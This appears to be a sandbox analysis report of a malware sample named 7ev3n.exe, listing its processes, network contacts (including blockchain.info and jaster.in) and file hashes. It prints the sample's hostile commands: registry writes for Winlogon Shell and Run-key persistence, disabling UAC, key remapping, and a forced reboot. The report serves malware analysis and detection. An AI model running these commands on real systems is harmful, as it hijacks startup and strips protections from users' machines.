REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\system.exe
C:\Users\Admin\AppData\Local\system.exe
C:\Users\Admin\AppData\Local\system.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
C:\Windows\SysWOW64\shutdown.exe
shutdown -r -t 10 -f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
C:\Windows\SysWOW64\shutdown.exe
shutdown -r -t 10 -f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| FR | 142.250.203.238:443 | clients2.google.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 150.171.27.11:80 | edge.microsoft.com | tcp |
| FR | 142.250.203.238:443 | clients2.google.com | tcp |
| FR | 142.250.203.238:443 | clients2.google.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| GB | 2.18.27.68:443 | copilot.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| FR | 142.250.201.1:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 185.199.111.133:443 | user-images.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | udp |
| GB | 2.20.12.74:443 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 185.199.111.133:443 | user-images.githubusercontent.com | tcp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| GB | 2.18.27.82:443 | www.bing.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 13.107.253.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| US | 150.171.27.11:443 | edge.microsoft.com | tcp |
| GB | 2.18.27.82:443 | www.bing.com | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| GB | 2.18.27.76:443 | www.bing.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 140.82.114.21:443 | collector.github.com | tcp |
| US | 185.199.111.133:443 | user-images.githubusercontent.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | blockchain.info | udp |
| US | 104.16.117.55:443 | blockchain.info | tcp |
| US | 8.8.8.8:53 | www.blockchain.com | udp |
| US | 104.17.172.30:443 | www.blockchain.com | tcp |
| US | 8.8.8.8:53 | jaster.in | udp |
| US | 104.16.117.55:443 | blockchain.info | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | jaster.in | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 6eac9d05429a9358b608d44d94784e10 |
| SHA1 | 73395ed98fee0a7a2f8585c37a8811bd8837585d |
| SHA256 | 0bf0ae5a65a11d2714b2ac12a424cd38ed0a8b7e7530ec59362786b1a832eb60 |
| SHA512 | 235731c2c6a85f6ada201f4e4c061ce7db201a2e82c04334a5bfcbfdba60f9ac1b99a06e9ac1e9bbea1651b16747fa4e44f68f6882a960671b6b613f51213c18 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 335b5f0a113217fe3a3239ed5dda4074 |
| SHA1 | 23822e61321ef8db2779fae56e60e5352d2de171 |
| SHA256 | a49f2757c1e5555b00072f9e4d0cae98a7ecc3d5536169754e630c246b4301be |
| SHA512 | 9057b96c6893e958622324feeb03902b71c7541521a6a5a9ecd89d6602f3e48185eac69c1a423d40f25ca5b82a6a47149523b1901746f305c3e692c6ca916b91 |
\??\pipe\crashpad_4852_REVSQXXWHXUQEHNA
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 3c30feffbcbe8ee124ab3b99c760e656 |
| SHA1 | 91d02559047694caf0144ed99f17d96aab6941aa |
| SHA256 | 5324790121264f471321603d73d3bd4a1156e1336b3d941d9cfa9bb02a75e16e |
| SHA512 | b33f6d658b7a93f493587ee60799a80c49774295a0e1230b419bef1c321cf0168cc2ad90229c830472e9df816520edb862eb323d130eafa6b8a7f4f4c7b919e7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 3913928d36a204b8c7a09f9664615308 |
| SHA1 | 6f5a2afcf7d4f9ba5d201c4575ee7ea5cbc904bc |
| SHA256 | 5cd63a20006de4c006a47a6b3a922a53b15bda4fbfd14e77b8a5416583c8f9b9 |
| SHA512 | 25f2410c171fb2c64bd4a3706a3a3b5de6f694cbebe555cc223996fd3a16d346737594d4cc09a737484d8a5e3a0ea33e0705ac60481b51857bdb3127a7996145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.ico
| MD5 | 164a788f50529fc93a6077e50675c617 |
| SHA1 | c53f6cd0531fd98d6abbd2a9e5fbb4319b221f48 |
| SHA256 | b305e470fb9f8b69a8cd53b5a8ffb88538c9f6a9c7c2c194a226e8f6c9b53c17 |
| SHA512 | ec7d173b55283f3e59a468a0037921dc4e1bf3fab1c693330b9d8e5826273c917b374c4b802f3234bbb5e5e210d55e52351426867e0eb8c9f6fba1a053cb05d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
| MD5 | 0f3c30bfda72b02923762fc21990399d |
| SHA1 | 71d38559bb04627872797a501c5fb2fa34325116 |
| SHA256 | 53401ad0f9facbc860bbc6636059e51e21a918a679b001cce8bf3998af0e5d2c |
| SHA512 | 89adbd09ee861a282efb10695acd85964c688b8fc44bb7cdb469f4d4f9a559951f9d2af7d03b8f4f74014e5f68815a2765a95866bdf184f0dc2700b94dd0bb40 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps
| MD5 | 06d55006c2dec078a94558b85ae01aef |
| SHA1 | 6a9b33e794b38153f67d433b30ac2a7cf66761e6 |
| SHA256 | 088bb586f79dd99c5311d14e1560bbe0bb56225a1b4432727d2183341c762bcd |
| SHA512 | ec190652af9c213ccbb823e69c21d769c64e3b9bae27bea97503c352163bf70f93c67cebbf327bfc73bfd632c9a3ae57283b6e4019af04750fe18a2410a68e60 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log
| MD5 | e0552c8f875cc8efd7141d8037a9bb0f |
| SHA1 | 623fba08922caa5bdcd411c150d512d549d734df |
| SHA256 | 2986a8b58eb0b3a77f61b9829025902fbc9ed5ea18677bad94724baffd20f49e |
| SHA512 | c01897f2cc926d5b955dadd61420f824750da50ee40e92e6034baa40f6142751f804e237150908ac1a8ad5bd57ebac0fffb907752216186ffb0b3c83eeb46341 |
C:\Users\Admin\AppData\Local\Temp\scoped_dir4852_1946365388\4f6e1ef7-ca6e-4e58-83a2-8a617ebe9315.tmp
| MD5 | b0917d8e6c5b6be358bff67f84eb8336 |
| SHA1 | a6e221edcb19a1cc81575b4ddd927fd9a6fbdd6d |
| SHA256 | dff2c9d9755f96713c08f4932a9091080808ec34c0823feac2206fa526f91e60 |
| SHA512 | cd5822bbf91e8f7f5ab2b471a4bf8b464bde95465e2fccc6a57e5a287ca55d5062bdd6d4b3cd76f8529ee7a9081b6a7aad7dc2a7581c344ce4fd2d3256bdf451 |
C:\Users\Admin\AppData\Local\Temp\18f7a337-4f4d-4e1c-a54d-26f322cdf84a.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Temp\d6728042-a2a0-4d1e-a757-f224b9d7c0bc.tmp
| MD5 | 78e47dda17341bed7be45dccfd89ac87 |
| SHA1 | 1afde30e46997452d11e4a2adbbf35cce7a1404f |
| SHA256 | 67d161098be68cd24febc0c7b48f515f199dda72f20ae3bbb97fcf2542bb0550 |
| SHA512 | 9574a66d3756540479dc955c4057144283e09cae11ce11ebce801053bb48e536e67dc823b91895a9e3ee8d3cb27c065d5e9030c39a26cbf3f201348385b418a5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 981ec649d9b8e4c704413c33d01296d4 |
| SHA1 | 9f58138ea4ff24b0766dcaeb5f235a24073357d7 |
| SHA256 | 9cfbdb14ce0bef9c3e8cfdcbe9b7df7124b2fa2ce477a1dc42ef1b9f7e334410 |
| SHA512 | 041bf0a16929d7906cfeb044a2cabfd53115c59d2d79c5fd93fb813498e3397f43ada10de95404758806c71f978f7824bb5757c70fdbe64cf1af9186e4b56e85 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist
| MD5 | 0f7dffbf03b1593316932f7b699ef98f |
| SHA1 | 6fb213aca5dc6e4f4290c1237c6b2a6bd55ec687 |
| SHA256 | a68654909d1a137d469d0e92182cdb546171cd10dd454934f34dad32c43a6719 |
| SHA512 | 27dcf44b063cef3099c9ef88c6b29effc264d5a3418f1a957f2738b6dc447f813f524cdde0b04de754ea99a4b78ec07724359a91fdfe487acc55c34bdae82bd9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\content.js
| MD5 | 3d20584f7f6c8eac79e17cca4207fb79 |
| SHA1 | 3c16dcc27ae52431c8cdd92fbaab0341524d3092 |
| SHA256 | 0d40a5153cb66b5bde64906ca3ae750494098f68ad0b4d091256939eea243643 |
| SHA512 | 315d1b4cc2e70c72d7eb7d51e0f304f6e64ac13ae301fd2e46d585243a6c936b2ad35a0964745d291ae9b317c316a29760b9b9782c88cc6a68599db531f87d59 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 992a6d018842b732b56408d48be21f73 |
| SHA1 | 96731bbf8d0fcbbbc4ce01a1fc41b624f749425a |
| SHA256 | bc528406d0fd02bad94a0c0ea16e290cd9b9e7f65874ef9c860b70ca3c17c788 |
| SHA512 | d445431b9b80b417900ea403393835c9ddac9cfba1eae40c0b8a00d28ab82dd918f8163a2f7d4864f86a91249a33db62ef1ea4fd110a86a15df7a21c6d2a1537 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | fecba82b60020ec832a7a957868be42d |
| SHA1 | 65ccacc0266438e80d97c0d62f74141d2043331e |
| SHA256 | bac90596627d041137fa7f448482834b8f9c3cbbe0f71bc67a0814b6d002b7c6 |
| SHA512 | c06de43ddc9f36375ec5d428b301705fd0093b8d187f08661e4f884a7544f2a8c972ce5d6eb52bb3280c843b2384edeec90ecd91a059f5ad7d61f6e16c002c1b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 33569d537b72060771829de4c42878d6 |
| SHA1 | 4488605cf44996e0f857c26a7874ae78195c1734 |
| SHA256 | 66d5d175ce30c225b597ed5bbb817b1e809cfec1d6c7fae33ab767e6a6270dc0 |
| SHA512 | 80d015921d4cf778e583d1f97022fb47b6150f78eaf362fd4fdbb70403213ce1a62ec73321edb19d45d125570686a3c002b2eaea645162a92ff763a1446bb0d4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
C:\Users\Admin\Downloads\7ev3n.exe
| MD5 | 9f8bc96c96d43ecb69f883388d228754 |
| SHA1 | 61ed25a706afa2f6684bb4d64f69c5fb29d20953 |
| SHA256 | 7d373ccb96d1dbb1856ef31afa87c2112a0c1795a796ab01cb154700288afec5 |
| SHA512 | 550a891c1059f58aa983138caf65a7ea9c326cb1b94c15f3e7594128f6e9f1295b9c2dbc0925637dba7c94e938083fffc6a63dc7c2e5b1e247679931cce505c6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 19897975fe723784fffa1e23c74f72b2 |
| SHA1 | 595f9a3f5f802ce6ba534d8dfe5033d24c1c8acf |
| SHA256 | 0ae64d3885576c2b4bd131f3dad61aeffa4358e52b448d00cef9f9c022959d6d |
| SHA512 | 0c58428e907c63c127d71d356b1913bd57b69fe93c8ffad10f26a590b994b0a9fb95afa7b0d1ba081feed8b515638f67b620b846cb64961c5def62842dd538eb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 0800ebb538dcb3ec8d9d2517ff5ad687 |
| SHA1 | 4ca4a2699caf0f5ef67ff4ce5c090e9cf3b7fb64 |
| SHA256 | 52cb76d1174521f7ba46a75073f96983d7f4c2c1c44606ccfa3d152f7ac450d0 |
| SHA512 | e38573222396e3dc46f46c362a6daf05affdac8e5b437bc30e1a2695332dc59c75dcbe60fbfc8167f9d7b4e1089fb5eecce703881699ab8b2cfd05604351c9ed |
C:\Users\Admin\AppData\Local\del.bat
| MD5 | f62904abb27a3574e2e6121349ab4955 |
| SHA1 | 35b3504f1d6bc88638a0721cf3d898eb0f95092a |
| SHA256 | d31225722321313554e736bcd9debc4cb4c5ed6dce3921fa7839162fede832b6 |
| SHA512 | e8d1cf4c6a745790b2eaf4b3618703337313e3f561ba88982bc1a139aa4b5b29fd5f78f925e5bd12669eed74ca78510f6d6b1ce091bc55299057d2b2e867fb4e |
C:\Users\Admin\AppData\Local\system.exe
| MD5 | 664951ba540b089747bc369e23b94b35 |
| SHA1 | 56e4d0cadeed041afb420e474cfb801302ca6657 |
| SHA256 | 075f66245f173858a6a79cd123fce181719be00e4223faff9c7f42ef2ebb8cf6 |
| SHA512 | 3c36e3e2ec3571346406d7d8bfa1de098ff81960eb21269e6d2c6695fb5fe935add476384bf17b111efafb69a6529aa31e209879ad7006cad25dc2ee0d377cc6 |
C:\Users\Admin\AppData\Local\bcd.bat
| MD5 | d20a8a43094ea0dbd522bbcd49532502 |
| SHA1 | a14fda6177bb86e7623e5c42d9c50473edcc8bd2 |
| SHA256 | 1acd8fa1bb77825270abb801b6fef7cfb02598e4eb77911722cc1d389b4cf318 |
| SHA512 | 84a1a5c21a69e6d090cc0cdf4731fd4bed52781a8ec17322f35ef085bbd38a516c1d9c0cef81b6ad154efb396e8d3f4700e496e1e2b24b238dac397c0b72b662 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_FB287BEB63DB9E8D59A799779773B97C
| MD5 | 4bb46684744cb50f1ea8dcab9bcd57a8 |
| SHA1 | dca72af767f41850a2829d11e45337d04adaf156 |
| SHA256 | 343aeea64fd0e63634d72b4973d489f652d5ff0c9df4caae2b1b03e5c298ec1d |
| SHA512 | 56672cc0069829428f6cc96fbfea6152b29622124080ac890d8b36f3a37356eb35d50eb6ef6d4908e02c663786749c56235a0cc75fe63a0acf6d9eeb6111d696 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_FB287BEB63DB9E8D59A799779773B97C
| MD5 | 8a00e6137d0061dd25fc1fbc9a0a7f71 |
| SHA1 | 8790ef6916d27577410fb2a1733b894712de2970 |
| SHA256 | 1edca1890998f378540524596f1385066977a017e2543d881284baaa7671b5ea |
| SHA512 | efc024bf039d4bf0ff9953533ea2a8dde377896e2c63214d68f1c57c9cf797f2692f628e9544da55c6f855fca7ee690015c797810cf2644d136443603608cc70 |
C:\Users\Admin\Desktop\GetConvertTo.docx
| MD5 | 5d65759737acb63b5e5245aa6b5545c8 |
| SHA1 | 902c2d147c9cf9088d832c4a08555fc84d8f66ce |
| SHA256 | fd2f8244ab6007ee3a56478696ae03ab29a2cdd71ebb4b0cb1ef985cff984751 |
| SHA512 | 74f9d9258117c7d25599b126687555633bcb2426793364f58f7d7f0e00dd0b23581fb938da393c3c2c69efd5df218c130fa74d92a9f61e2c3e6dcd3d1abc2d5c |
C:\Users\Admin\Desktop\3.R5A
| MD5 | 43dad3bc2dc454ce0f14fb43223e2c79 |
| SHA1 | 723cfe09815c89ebef6cb7099cde5aabaa10663c |
| SHA256 | a2cb77e490218d0e13131ce1c10a2ff7385b0d2d61d55a3c9bf46d4e2f2f6b93 |
| SHA512 | 9843c6771676c08885ac6b2e8c5caf456c1f93406dc6c7b51111cf9eb659c33c6734b77126021a572671e1c57858bac261d86fbb88feb22dedde48762b0b93fb |
C:\Users\Admin\Desktop\InitializeRestore.docm
| MD5 | bd90ebed0def067cf3e7a7a1d7bc1235 |
| SHA1 | ce4f601d938fe712c09d84441acbab0a8cf3dc3c |
| SHA256 | db4f8be104df43ac66816058f5f9f5d8b0ef6915ce120685931da86a5c7452a4 |
| SHA512 | 15c3eae0947fabe8ebac3409fe9942c474df76c09c80d79d05113f036bfe8883609a639569e3e1ab8ead551f9bd53d7e496d7e7cb580c7995631330f9fa56358 |
C:\Users\Admin\Desktop\InvokeUnlock.xlsx
| MD5 | 679aff293c7de1c5e11707ae8c4a0828 |
| SHA1 | 49d33f0b34c8e44105e3c45920b41a2a1e4df260 |
| SHA256 | 6540caca27f73a4c3e7f451249a1f5514fd294e6a9df5c6b44b81e2cd375f241 |
| SHA512 | d38748963c788e42bc05ffacddb77d8e1c4219010b71c033d236fdf76bb24929595f6092eaec9a4a19c81b8795d8a84abf466a7c4ffa4deff971ef01356cbaa2 |
C:\Users\Admin\Desktop\InvokeUnlock.xlsx
| MD5 | cdacff188e1a06c9f4dac3b0d6d5ef32 |
| SHA1 | 468f782f86883a820f2e2fcfefb4cb76c4d579bd |
| SHA256 | 3b4f0fafe180e7503ad1f49b686ec0565bbae0b79c00ea2075226224b23dad87 |
| SHA512 | d0cff54fe2ecad69f5b679f7b4a7ab0bff28354438f85a638dbc25abe438b690f4a776167b1af5ceb267ede76ebedc51a35b3160a81663434c5bbd503219a852 |
C:\Users\Admin\Desktop\PublishEnable.zip
| MD5 | 47f80b1a84a5ee3651b6d9e1f71d3ac0 |
| SHA1 | 7e23c0d35453b9a58faaa21ceb42c85c7b183aaa |
| SHA256 | 49c814c0bb8a721e511cc8e563d0e46a9180e3a43043327a964b534f76d29ae8 |
| SHA512 | 744d3220971d6ccdf6bdd3afc257e118911cd847d3267f331b2c1c9bd95559e49b90225fe9ee6cbd8011cb7597f9d8a8cff4008ab4419d53401772b4919bd230 |
